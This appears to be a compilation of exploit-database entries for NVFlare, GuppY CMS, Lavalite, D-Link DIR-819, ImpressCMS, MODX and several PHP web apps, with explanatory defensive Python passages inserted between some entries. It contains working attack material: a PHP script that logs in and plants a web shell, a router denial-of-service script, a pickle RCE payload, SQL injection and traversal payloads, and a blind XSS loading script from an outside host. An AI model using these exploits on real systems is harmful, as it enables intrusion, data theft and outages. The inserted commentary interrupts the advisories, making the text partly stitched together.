
# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
# Exploit Author: Elias Hohl
# Google Dork: N/A
# Date: 2022-06-21
# Vendor Homepage: https://www.nvidia.com
# Software Link: https://github.com/NVIDIA/NVFlare
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-34668

https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55

There is a Remote Code Execution vulnerability in NVIDIA NVFlare (https://github.com/NVIDIA/NVFlare). It is possible for connected clients to execute arbitrary commands on the server. It was not investigated whether the server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands when they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server and ALL connected clients.

The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done; I considered line 568 in private/fed/server/fed_server.py the occurrence that is accessible with the least effort and thus used it in my PoC exploit.

The client generates a malicious data packet like this:

aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))
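The advisory does not reproduce generate_payload(), so the following is an added reconstruction of the standard pickle __reduce__ trick, not the author's code: a pickled object whose __reduce__ names a callable is executed by pickle.loads() before anything is returned to the caller, which is exactly why a server that unpickles client-supplied data (here the fl_context blob) runs the client's command. The second half shows the fix a practitioner wants next to it: an Unpickler whose find_class() only resolves an explicit allowlist of plain data types, so a payload naming os.popen, os.system or subprocess fails before the callable is ever invoked. os.popen is used instead of the PoC's os.system only so the command's output can be captured and checked; the "fl_context" dict is a constructed stand-in for real NVFlare data.

```python
import io
import os
import pickle


class PickleRCE:
    """Object whose __reduce__ tells the unpickler to call os.popen(cmd).

    pickle serialises "call this callable with these arguments"; pickle.loads()
    performs the call while reconstructing the object, i.e. before the server
    has any chance to inspect what it received.
    """

    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        # os.popen rather than os.system so the demo can read the command output
        return (os.popen, (self.cmd,))


def generate_payload(cmd: str) -> bytes:
    """Serialise a PickleRCE; the command runs wherever these bytes are unpickled."""
    return pickle.dumps(PickleRCE(cmd))


def unsafe_loads(data: bytes) -> str:
    """What a vulnerable server effectively does: trust pickle bytes from the network.

    Returns the command's stdout to make it visible that code ran during loads().
    """
    return pickle.loads(data).read()


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves an explicit allowlist of globals.

    Every GLOBAL opcode goes through find_class(); anything not listed here
    (os.popen, subprocess.Popen, builtins.eval, ...) raises before it is called.
    """

    ALLOWED = {
        ("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
        ("builtins", "tuple"), ("builtins", "str"), ("builtins", "int"),
        ("builtins", "float"), ("builtins", "bool"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def restricted_loads(data: bytes):
    """Deserialise plain data containers only; raise on anything naming a callable."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if the restricted unpickler refuses the payload."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def roundtrip_plain(obj):
    """Pickle a plain data structure and load it through the restricted unpickler."""
    return restricted_loads(pickle.dumps(obj))


if __name__ == "__main__":
    evil = generate_payload("echo pwned")
    print("vulnerable loads() ran the command, output:", unsafe_loads(evil).strip())
    print("restricted unpickler rejects it:", is_rejected(evil))
    # constructed stand-in for an fl_context message, not real NVFlare data
    print("plain data still loads:", roundtrip_plain({"fl_context": {"round": 3, "peers": ["site-1", "site-2"]}}))
```

The allowlist approach is a stop-gap for code that cannot drop pickle immediately; the proper fix, which is what the 2.1.4 release notes for this CVE describe, is to stop using pickle for data that crosses a trust boundary altogether.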



REPLICATION

This example uses the server in poc mode. The provision mode seems to run the same code in fed_server.py and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials.)

This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.

Make sure to use Python 3.8; the nightly builds don't work with Python >= 3.9.

sudo apt update
sudo apt-get install python3-venv curl

python3 -m venv nvflare-env

source nvflare-env/bin/activate

python3 -m pip install -U pip
python3 -m pip install -U setuptools
python3 -m pip install torch torchvision tensorboard

git clone https://github.com/NVIDIA/NVFlare.git
cd NVFlare
git checkout 2.1.2
git apply nvflare-exploit-apply.txt  # note that this only modifies the client side code
python3 -m pip install .

cd
poc -n 2

mkdir -p poc/admin/transfer
cp -rf NVFlare/examples/* poc/admin/transfer

In four separate terminals, execute (after running source nvflare-env/bin/activate in each one):

./poc/server/startup/start.sh

./poc/site-1/startup/start.sh

./poc/site-2/startup/start.sh

./poc/admin/startup/fl_admin.sh localhost

In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:
nc -lvp 4321

In the admin console, execute:

check_status server

to verify both clients are connected. Then:

submit_job hello-pt-tb

It will take a few minutes until the job finishes downloading the required files; then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is not data the program can continue working with). You can also shut down netcat, which will result in "Connection refused" errors in the server tab.
            
# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
# Date: Sep 30, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.freeguppy.org/
# Software Link: https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
# Version: 6.00.10
# Tested on: Linux

#!/usr/bin/php
<?php
// GuppY 6.00.10 - authenticated RCE: log in as an administrator, upload a PHP
// file through the admin upload page, then call it with a command.

$username = "Admin2";   // Administrator username
$password = "rose1337"; // Administrator password

$options = getopt('u:c:');

if (!isset($options['u'], $options['c'])) {
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n\n Usage : php exploit.php -u http://target.org/ -c whoami\n\n");
}

$target  = $options['u'];
$command = $options['c'];

// Administrator login (the session cookie is kept in cookie.txt for the next requests)

$cookie = "cookie.txt";
$url = "{$target}guppy/connect.php";

$postdata = "connect=on&uuser=old&pseudo=" . $username . "&uid=" . $password;
$curlObj = curl_init();

curl_setopt($curlObj, CURLOPT_URL, $url);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curlObj, CURLOPT_HEADER, 1);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($curlObj, CURLOPT_POST, 1);
curl_setopt($curlObj, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curlObj, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curlObj, CURLOPT_TIMEOUT, 30);
curl_setopt($curlObj, CURLOPT_COOKIEFILE, $cookie);
curl_setopt($curlObj, CURLOPT_COOKIEJAR, $cookie);
$result = curl_exec($curlObj);

// Uploading the shell: multipart form with field "rep" (target folder) and
// file field "ficup", built by hand with CRLF line endings as the browser sends it

$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";

$boundary = "----WebKitFormBoundarygA1APFcUlkIaWal4";
$post = "--{$boundary}\r\n"
      . "Content-Disposition: form-data; name=\"rep\"\r\n\r\n"
      . "file\r\n"
      . "--{$boundary}\r\n"
      . "Content-Disposition: form-data; name=\"ficup\"; filename=\"shell.php\"\r\n"
      . "Content-Type: application/x-php\r\n\r\n"
      . "<?php system(\$_GET[\"cmd\"]); ?>\r\n"
      . "--{$boundary}--\r\n";

$headers = array(
    'Content-Type: multipart/form-data; boundary=' . $boundary,
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
    'Accept-Encoding: gzip, deflate',
    'Accept-Language: en-US,en;q=0.9'
);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curlObj, CURLOPT_URL, $url2);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
curl_setopt($curlObj, CURLOPT_POST, true);
$data = curl_exec($curlObj);

// Executing the shell (GET request; the command is URL-encoded so arguments survive)

$shell = "{$target}guppy/file/shell.php?cmd=" . urlencode($command);
curl_setopt($curlObj, CURLOPT_URL, $shell);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($curlObj, CURLOPT_HEADER, false);
curl_setopt($curlObj, CURLOPT_POST, false);

$exec_shell = curl_exec($curlObj);

$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);

if ($code != 200) {
    echo "\n\n \e[5m\033[31m[-] Something went wrong! \n [-] Please check the credentials\n";
} else {
    print("\n");
    print($exec_shell);
}
curl_close($curlObj);

?>
            
## Exploit Title: Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal
## Exploit Author: nu11secur1ty
## Date: 09.29.2022
## Vendor: https://lavalite.org/
## Software: https://github.com/LavaLite/cms/releases/tag/v9.0.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite


## Description:
The XSRF-TOKEN cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The payload

../../../../../../../../../../../../../../../../etc/passwd[0x00]eyJpdiI6InhwNlhibUc0K3hrL3RQdHZNYlp5Qnc9PSIsInZhbHVlIjoiU2daQ2YzeFNWSjN4OHZNdEZSMlhiOVpkbGUweDdKSDdXbXc1eitGc3RSTXNFTFBqUGR1ekJOSitUTjcyWVRYTkVzV2lpMDkxb3FHM2k5S1Y2VlZZRGVVN2h2WkpJeGcxZVluVDhrdDkvUDgxN2hTNjY5elRtQllheDlPOEM5aGgiLCJtYWMiOiI4ZDBkMjI0NmFkNDQ2YTA5ZjhkNDI0ZjdhODk0NWUzMjY2OTIxMjRmMzZlZjI4YWMwNmRiYTU5YzRiODE5MDk5IiwidGFnIjoiIn0=

was submitted in the XSRF-TOKEN cookie ([0x00] stands for a NUL byte placed between the traversal string and the original base64 cookie value). The requested file was returned in the application's response. A malicious user can obtain very sensitive information from this CMS.
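The two cookie payloads above use the three classic evasions of a traversal filter: a long run of ../ segments, a NUL byte to cut the path short before the decoy that follows, and (in the lavalite_session "tag" field) URL-encoded %2e%2e%2f so a naive substring check for "../" never fires. As an added example, not part of the advisory or of LavaLite's code, the following Python shows the canonicalisation a server must do before making any decision about a client-supplied path, and a check that a Laravel-style base64/JSON cookie does not carry such a string in any of its fields. The document root and the sample cookie are constructed for the demo; the session cookie is built with the same iv/value/mac/tag shape as the one in the request but with dummy contents.

```python
import base64
import json
import posixpath
from urllib.parse import unquote


def canonicalise(user_path: str) -> str:
    """Decode and normalise a client-supplied path before any security decision.

    - URL-decodes until the value stops changing, so %2e%2e%2f and
      double-encoded %252e%252e%252f both become ../
    - truncates at the first NUL byte, because a C-level open() stops there
      and whatever follows is only a decoy for the filter
    - collapses ./ and ../ segments with posixpath.normpath
    """
    decoded = user_path
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    decoded = decoded.split("\x00", 1)[0]
    return posixpath.normpath(decoded)


def is_traversal_attempt(user_path: str) -> bool:
    """True if the canonical form escapes the directory it is meant to be relative to."""
    canon = canonicalise(user_path)
    return canon.startswith("/") or canon == ".." or canon.startswith("../")


def resolve_under_root(root: str, user_path: str):
    """Map a user-supplied relative path onto root; None if it would leave root."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, canonicalise(user_path).lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def laravel_cookie_fields(cookie_value: str) -> dict:
    """Decode a Laravel-style cookie: URL-encoded base64 of a JSON object (iv/value/mac/tag)."""
    return json.loads(base64.b64decode(unquote(cookie_value)))


def suspicious_cookie_fields(cookie_value: str) -> list:
    """Names of string fields in the cookie whose content canonicalises to a traversal."""
    return [name for name, val in laravel_cookie_fields(cookie_value).items()
            if isinstance(val, str) and is_traversal_attempt(val)]


# Constructed sample, not a real session: same layout as the lavalite_session
# cookie in the request, with a URL-encoded traversal smuggled into "tag".
SAMPLE_COOKIE = base64.b64encode(json.dumps({
    "iv": "AAAAAAAAAAAAAAAAAAAAAA==",
    "value": "opaque-ciphertext",
    "mac": "0" * 64,
    "tag": "%2e%2e%2f" * 11 + "etc%2fpasswd",
}).encode()).decode()


if __name__ == "__main__":
    root = "/var/www/cms/storage"          # assumed document root for the demo
    payload = "../" * 16 + "etc/passwd\x00eyJpdiI6"
    print(is_traversal_attempt(payload), resolve_under_root(root, payload))
    print(resolve_under_root(root, "themes/public/app.js"))
    print(suspicious_cookie_fields(SAMPLE_COOKIE))
```

resolve_under_root() is the only check that matters on the server: it never looks at the raw string, it joins the canonical path to the root and verifies the result is still beneath it.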

STATUS: HIGH Vulnerability

[+]Payload:

```http
GET /cms-master/website/public/about.html HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: XSRF-TOKEN=eyJpdiI6IjNZbEZudjg0RXpFNEVLWHBUK0p6R1E9PSIsInZhbHVlIjoiNjFVbmZUVUJQWVdYWXJVOUVJRWVVdHN0UWtOQjJXZGRiS2N4T2lkM0VDeXFxcDRZdG1tRFVaQUk3dlhsWHRvOVQxVnQvbFhWRUJTbUllczh6MmhFUE84N1puNVFMSVFFeWdmRlJUYkdFRGdCakZ4eEJXeHllRTdFOFNPK0pLcnkiLCJtYWMiOiJhMDBlZWFiNDFlNzE2Yzc1ZjA2NzEzYzY2Y2U0ZDQ3NzdkMTI4OTY1NjA4OTNmNDE4ZDNmNWRkYzFkN2IzMWEwIiwidGFnIjoiIn0%3D;
lavalite_session=eyJpdiI6ImxiWmVuV0xlU3ZtVWhLVW1Oc2duSEE9PSIsInZhbHVlIjoiUG5WMjhMNVppUkhST1Bta1FOd1VJUDR5ZW1lRU56bXpDTnpaVzkrUHFzQzJpKzE4YlFuNEQ2RnNlKzM2Tkg0Y2VZMExCRTBUUnRQajlpTmJCUXJjT3ZETzV6OVZveURuaTFHOHdoN3pneUR3NGhQc09OUjdKb0VreFV1Y0tuOTgiLCJtYWMiOiJlMTdlMTAyZTQ3MmMyMjZlMWE5MTkwMzc0NTU2OTFkOTlmOTM4MGVlZDE4NWU4MGNkZGM4OTllMTRmYTE3MGM1IiwidGFnIjoiJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmZXRjJTJmcGFzc3dkIn0%3d
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/cms-master/website/public/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+]Response:

```http
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/manifest.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/vendor.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/app.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/main.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/theme.js"></script>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite)

## Proof and Exploit:
[href](https://streamable.com/nis1hg)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
            
## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
## Exploit Author: nu11secur1ty
## Date: 03.17.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Employee Performance Evaluation System 1.0 suffers from a File Inclusion vulnerability that leads to RCE. An ordinary user of this system is allowed to upload a malicious file to the server and can afterwards execute the included file remotely on the victim's server. This can bring the system down, destroy all information stored in it, or allow that information to be stolen.

STATUS: CRITICAL Vulnerability


[+]Get Info:

```php
<?php
// by nu11secur1ty - 2023
phpinfo();
?>
```
[+]Exploit:

```php
<?php
// by nu11secur1ty - 2023
// Old name of the directory
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/";

// New name for the directory
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/";

// using the rename() function to rename the directory
rename($old_name, $new_name);
?>
```

## Proof Of Concept:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0

            

DLink DIR 819 A1 - Denial of Service

# Exploit Title: DLink DIR 819 A1 - Denial of Service
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL: False
# [i] Request Timeout: 30s
# [i] Buffer Length: 19
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!

#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print

# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32


# Class to exploit
class Exploit:
    def __init__(self, ip, is_ssl):
        """Initialize the constructor"""
        self.ip = ip
        self.is_ssl = is_ssl
        # an over-long numeric sys_Token value is what crashes the web service
        _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
        if self.is_ssl:
            self.payload = f"https://{_payload}"
        else:
            self.payload = f"http://{_payload}"

    def show(self):
        """Show the parameters"""
        print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")

    def run(self):
        """Run the exploit"""
        print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
        self.show()
        try:
            r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
            if "Internal Error" in r.text:
                print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
                print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
            else:
                print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
        except requests.exceptions.Timeout:
            # no answer within TIMEOUT seconds also means the service is gone
            print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
        except Exception as e:
            print(f"Error occurred as: {e}")


def main():
    """Main function to run"""
    parser = argparse.ArgumentParser(description="DLink DIR-819 Unauthenticated DoS")
    parser.add_argument('-i', '--ip', required=True, help="IP of the router")
    parser.add_argument('-s', '--ssl', required=False, action="store_true")
    opts = parser.parse_args()
    try:
        ip = socket.gethostbyname(opts.ip)
    except socket.error:
        print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
        return
    is_ssl = opts.ssl
    exploit = Exploit(ip, is_ssl)
    exploit.run()


if __name__ == '__main__':
    main()

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

# Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)
# Date: 2022-07-02
# Exploit Author: Ali Alipour
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 Pro x64 - XAMPP Server
# CVE : CVE-2022-35155

#Issue Detail:
The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

# Vulnerable page: /buspassms/download-pass.php
# Vulnerable Parameter: searchdata [ POST Data ]

#Request :

POST /buspassms/download-pass.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3
Origin: https://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: https://127.0.0.1/buspassms/download-pass.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 25

searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=

#Response :

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2022 00:14:25 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8
X-Powered-By: PHP/7.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6425
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<title>Bus Pass Management System || Pass Page</title>
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba ...[SNIP]...
<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>
...[SNIP]...
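The request/response pair above is the whole proof: the searchdata value comes back byte-for-byte inside the <h4>, which is what makes the alert(1) fire. The same reflected-or-stored-unescaped pattern is behind the FlatCore, Clansphere and Birth Certificate System XSS entries further down this page. As an added example, not code from any of those advisories or products, the following Python shows the triage check a tester runs with such a canary (reflected raw, reflected only in entity-encoded form, or not reflected at all) against two small stand-ins for the page: one that drops the parameter into the HTML as the vulnerable download-pass.php does, and one that escapes it. The render functions are constructed stand-ins, not the application's PHP.

```python
import html
from urllib.parse import parse_qs

# The advisory's probe: random prefix/suffix around a <script> so a match is unambiguous.
PAYLOAD = "cyne7<script>alert(1)</script>yhltm"


def param_from_body(body: str, name: str) -> str:
    """Decode one field of an application/x-www-form-urlencoded POST body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def render_result_vulnerable(searchdata: str) -> str:
    """Stand-in for the vulnerable page: the raw parameter is dropped into the HTML."""
    return f'<h4 style="padding-bottom: 20px;">Result against "{searchdata}" keyword </h4>'


def render_result_fixed(searchdata: str) -> str:
    """Same output with the value entity-encoded, which is the fix for an HTML text/attribute context."""
    return f'<h4 style="padding-bottom: 20px;">Result against "{html.escape(searchdata, quote=True)}" keyword </h4>'


def classify_reflection(canary: str, body: str) -> str:
    """'raw' = reflected verbatim (exploitable), 'escaped' = only an entity-encoded copy, 'absent' = not reflected."""
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body or html.escape(canary, quote=False) in body:
        return "escaped"
    return "absent"


def probe(render, canary: str = PAYLOAD) -> str:
    """Submit the canary to a page-rendering function and classify what comes back."""
    return classify_reflection(canary, render(canary))


if __name__ == "__main__":
    body = "searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search="
    print("submitted value:", param_from_body(body, "searchdata"))
    print("vulnerable page:", probe(render_result_vulnerable))
    print("fixed page:     ", probe(render_result_fixed))
```

For a blind/stored case like the Birth Certificate entry the classification runs against the admin-side page that later displays the record, not the immediate response; the canary and the three outcomes stay the same.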

ImpressCMS v1.4.3 - Authenticated SQL Injection

# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26986
# Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above...
# Vendor: https://www.impresscms.org
# Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3
###############################################

#Step1- Login with Admin Credentials
#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1
Host: 192.168.56.117
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701
Content-Length: 1011
Origin: http://192.168.56.117
Connection: close
Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1
Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3
Upgrade-Insecure-Requests: 1

-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="mimetypeid"

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="extension"

bin
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="types"

application/octet-stream
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="name"

Binary File/Linux Executable
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="icms_page_before_form"

http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="op"

addmimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="modify_button"

Submit
-----------------------------40629177308912268471540748701--

Vulnerable Payload: 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)

Output:

web application technology: Apache 2.4.52, PHP 7.4.27
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [6]:
[*] impresscms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 26th Feb'2022
# CVE ID: CVE-2022-26149
# Confirmed on release 2.8.3-pl
# Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt
# Vendor: https://modx.com/download
###############################################

#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default, hence we need to abuse the functionality: add the php file extension under the "Uploadable File Types" option available in "System Settings"
#Step3- Now go to Media => Media Browser and upload the Shell.php
#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:

listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056
bash: cannot set terminal process group (1445): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/modx$

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

# Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP

Steps to reproduce:

1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
2) Fill the form and enter the XSS payload "><script src=https://prasheekk05.xss.ht></script> in the address field
3) Click on Add Details and intercept the request in Burp Suite
4) After this, the details have been submitted.
5) As soon as the admin (victim) receives our request and clicks on it to verify our form, the XSS payload fires.
6) Now the attacker gets the details of the victim, like the victim's IP address, cookies, etc.
7) So the attacker succeeds in getting the victim's IP address and other details.

#POC's
https://ibb.co/kSxFp2g
https://ibb.co/VvSVRsy
https://ibb.co/mSGp4FX
https://ibb.co/hXbJ9TZ
https://ibb.co/M6vS08S

Canteen-Management v1.0 - SQL Injection

## Exploit Title: Canteen-Management v1.0 - SQL Injection
## Exploit Author: nu11secur1ty
